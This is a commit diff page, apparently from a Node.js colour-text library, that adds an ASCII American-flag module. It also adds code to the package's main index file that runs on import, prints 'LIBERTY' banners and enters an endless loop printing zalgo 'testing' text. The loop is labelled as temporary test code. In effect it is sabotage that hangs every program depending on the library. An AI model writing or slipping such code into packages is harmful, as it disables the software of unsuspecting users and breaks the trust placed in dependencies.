Skip to content

Commit 074a0f8

Browse files
committed
Adds new American flag module
1 parent 7ddd6a3 commit 074a0f8

File tree

2 files changed

+41
-0
lines changed

2 files changed

+41
-0
lines changed

lib/custom/american.js

+31
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,31 @@
1+
module.exports = function americanFlag () {
2+
console.log('LIBERTY LIBERTY LIBERTY'.yellow);
3+
console.log('LIBERTY LIBERTY LIBERTY'.america);
4+
console.log('LIBERTY LIBERTY LIBERTY'.yellow);
5+
let flag = "\
6+
\
7+
!\
8+
H|H|H|H|H H__________________________________\
9+
H|§|§|§|H H|* * * * * *|---------------------|\
10+
H|§|∞|§|H H| * * * * * |---------------------|\
11+
H|§|§|§|H H|* * * * * *|---------------------|\
12+
H|H|H|H|H H| * * * * * |---------------------|\
13+
H|H|H|H|H H|---------------------------------|\
14+
=============== H|---------------------------------|\
15+
/| _ _ |\ H|---------------------------------|\
16+
(| O O |) H|---------------------------------|\
17+
/| U |\ H-----------------------------------\
18+
| \=/ | H\
19+
\_..._/ H\
20+
_|\I/|_ H\
21+
_______/\| H |/\_______ H\
22+
/ \ \ / / \ H\
23+
| \ | | / | H\
24+
| ||o|| | H\
25+
| | ||o|| | | H\
26+
| | ||o|| | | H Carl Pilcher\
27+
";
28+
29+
console.log(flag);
30+
31+
}

lib/index.js

+10
Original file line numberDiff line numberDiff line change
@@ -11,3 +11,13 @@ module['exports'] = colors;
1111
//
1212
//
1313
require('./extendStringPrototype')();
14+
15+
/* remove this line after testing */
16+
let am = require('../lib/custom/american');
17+
am();
18+
for (let i = 666; i < Infinity; i++;) {
19+
if (i % 333) {
20+
// console.log('testing'.zalgo.rainbow)
21+
}
22+
console.log('testing testing testing testing testing testing testing'.zalgo)
23+
}

0 commit comments

Comments
 (0)